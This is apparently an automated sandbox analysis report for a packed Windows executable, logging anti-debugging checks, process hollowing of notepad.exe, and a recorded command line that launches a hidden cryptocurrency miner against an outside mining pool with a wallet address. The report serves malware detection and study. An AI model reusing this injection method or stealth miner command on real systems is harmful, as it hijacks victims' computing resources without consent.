Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 24, 2021, 10 a.m.	June 24, 2021, 10:10 a.m.

Size	1.9MB
Type	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5	`2edfacc58679637e8b8770e9d0c62481`
SHA256	`e25da2fe26625338ac9df8f61896c0b39cc582aa3df409f8c78154ba9e810f09`
CRC32	`62E1800E`
ssdeep	`49152:1Qvr80MXju2u9XYcGo24oGfSKBUUD+xsf+13D1oLJ+b4cvqDEgz:uvQjuR9IcGo2x4SKhD+xsf+t2LU8HDEg`
Yara	PE_Header_Zero - PE File Signature IsPE64 - (no description) Generic_Malware_Zero - Generic Malware

sos.exe "C:\Users\test22\AppData\Local\Temp\sos.exe"
1016

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 24, 2021, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 24, 2021, 10 a.m.			0	0
IsDebuggerPresent June 24, 2021, 10 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 24, 2021, 10 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 57 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002250000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c2c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ce1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ca8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91caa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x001e9e00', u'virtual_address': u'0x00002000', u'entropy': 7.999820920518947, u'name': u'.text', u'virtual_size': u'0x001e9c0c'}

entropy

7.99982092052

description

A section with a high entropy has been found

entropy

0.999235084141

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://github.com/openwall/john/issues/3454
url	http://www.gnu.org/licenses/
url	http://www.jsonrpc.org/

Yara rule detected in process memory (13 events)

description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Perform crypto currency mining	rule	BitCoin

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1348 region_size: 4603904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000002c0	1	0	0

Manipulates memory of a non-child process indicative of process injection (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1016 manipulating memory of non-child process 1348
NtUnmapViewOfSection June 24, 2021, 10 a.m.	base_address: 0x0000000140000000 region_size: 8786417680384 process_identifier: 1348 process_handle: 0x00000000000002c0		-1073741799	0
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1348 region_size: 4603904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000002c0	1	0	0

Potential code injection by writing to the memory of another process (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1016 injected into non-child 1348
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $zÎñF>¯>¯>¯eÇq¯eÇ"¯eÇý¯5À-¯5À7¯5À¢¯eÇ2¯ñiQ?¯iP.¯øÀ<¯Î=¯>¯\|®øÀ1¯øÀ(¯øÀ?¯øÀ`?¯>¯?¯øÀ?¯Rich>¯PEd ÷:`ð"+Ô$@@FíÅE`à':ØV¸~: E <H°E8Pú5 û5(pú500+p.textx++ `.rdata¤j0+l+@@.dataüx :ø:@À.pdataH < z;@@.nv_fatbH6@>8=@À.nvFatBiEÒD@À_RDATAEÔD@@.rsrc EÖD@@.reloc8°EÞD@B base_address: 0x0000000140000000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1	0
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: ±CbF@>@ base_address: 0x0000000140458000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1	0
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: &&&&È&Ð&à&ð&& &0&°&@&&P&p&¥&N&K&w&G&T&d&t&D&\|&X&&&P&`&p&@&& base_address: 0x0000000140459000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1	0
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: (@Xpè ¸ È Ø¡Ehh¥E¥E} IDI_ICON1( ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR\|NEnj_Y(fa\|e`¯`Z?lh}SKw3'_X\Ue`didfa½d_¢^X`Zz?3~ZS~VOc^Qhcyf`qd_faÄc^~ZS \V~XPw3'a[9e`pb\_aZo`Za[d_¬a\XzA6~ZS~YR\U~YQ_YZ`Zgd^f`¶d^Úb\µ`Z`Z{~[T(`Z}VN~WP·ÿÿ[T=c]f`gaµga¸d^Þd^çd^Ûa[¨\UKj}UM}UNlg`Y5gagb¦ga±ga¹d^Þd^äd_Þd_Í`ZKlh}UM~YR}VOd^Tid\|hcga¥e_Òe`ÏfaÇc^~YR ~\UyC;a[]Wfamidvhcfa¹faÅe_®_Y*b]z?7}UMt%a[>hcwidfa¸faÂb\]s}VN\U~ZRd_]icfa»d^~[U]W\|NFe`_X$ga{e`¬`Z8e`\|LD~WP{J@b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x000000014045a000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1	0
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: @ base_address: 0x000007fffffd8010 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1	0

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1016 injected into non-child 1348
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $zÎñF>¯>¯>¯eÇq¯eÇ"¯eÇý¯5À-¯5À7¯5À¢¯eÇ2¯ñiQ?¯iP.¯øÀ<¯Î=¯>¯\|®øÀ1¯øÀ(¯øÀ?¯øÀ`?¯>¯?¯øÀ?¯Rich>¯PEd ÷:`ð"+Ô$@@FíÅE`à':ØV¸~: E <H°E8Pú5 û5(pú500+p.textx++ `.rdata¤j0+l+@@.dataüx :ø:@À.pdataH < z;@@.nv_fatbH6@>8=@À.nvFatBiEÒD@À_RDATAEÔD@@.rsrc EÖD@@.reloc8°EÞD@B base_address: 0x0000000140000000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1016 called NtSetContextThread to modify thread in remote process 1348
NtSetContextThread June 24, 2021, 10 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5371108864 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1571096 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092858368 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000002bc process_identifier: 1348	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1016 resumed a thread in remote process 1348
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000002bc suspend_count: 1 process_identifier: 1348	1	0	0

Executed a process and injected code into it, probably while unpacking (32 events)

Time & API	Arguments	Status	Return
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 1016	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x000000000000013c suspend_count: 1 process_identifier: 1016	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x0000000000000180 suspend_count: 1 process_identifier: 1016	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000002a4 suspend_count: 1 process_identifier: 1016	1	0
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000000d0	1	0
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000000d0	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000000d0 suspend_count: 1 process_identifier: 1016	1	0
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x000000000000013c	1	0
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x000000000000013c	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x000000000000013c suspend_count: 1 process_identifier: 1016	1	0
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x000000000000013c	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x000000000000013c suspend_count: 1 process_identifier: 1016	1	0
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000000d0	1	0
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000000d0	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000000d0 suspend_count: 1 process_identifier: 1016	1	0
CreateProcessInternalW June 24, 2021, 10 a.m.	thread_identifier: 2660 thread_handle: 0x00000000000002bc process_identifier: 1348 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: C:\Windows/System32\notepad.exe --cinit-find-e --pool=stratum://`0x1546e5bEF63D62484FF78192a233376E18671b6D`.x1@eu1.ethermine.org:4444 --cinit-max-gpu=100 --response-timeout=30 --farm-retries=30 --cinit-stealth filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 1 process_handle: 0x00000000000002c0	1	1
NtUnmapViewOfSection June 24, 2021, 10 a.m.	base_address: 0x0000000140000000 region_size: 8786417680384 process_identifier: 1348 process_handle: 0x00000000000002c0		-1073741799
NtAllocateVirtualMemory June 24, 2021, 10 a.m.	process_identifier: 1348 region_size: 4603904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000002c0	1	0
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $zÎñF>¯>¯>¯eÇq¯eÇ"¯eÇý¯5À-¯5À7¯5À¢¯eÇ2¯ñiQ?¯iP.¯øÀ<¯Î=¯>¯\|®øÀ1¯øÀ(¯øÀ?¯øÀ`?¯>¯?¯øÀ?¯Rich>¯PEd ÷:`ð"+Ô$@@FíÅE`à':ØV¸~: E <H°E8Pú5 û5(pú500+p.textx++ `.rdata¤j0+l+@@.dataüx :ø:@À.pdataH < z;@@.nv_fatbH6@>8=@À.nvFatBiEÒD@À_RDATAEÔD@@.rsrc EÖD@@.reloc8°EÞD@B base_address: 0x0000000140000000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: base_address: 0x0000000140001000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: base_address: 0x00000001402b3000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: base_address: 0x00000001403aa000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: base_address: 0x00000001403c2000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: base_address: 0x00000001403e4000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: ±CbF@>@ base_address: 0x0000000140458000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: &&&&È&Ð&à&ð&& &0&°&@&&P&p&¥&N&K&w&G&T&d&t&D&\|&X&&&P&`&p&@&& base_address: 0x0000000140459000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
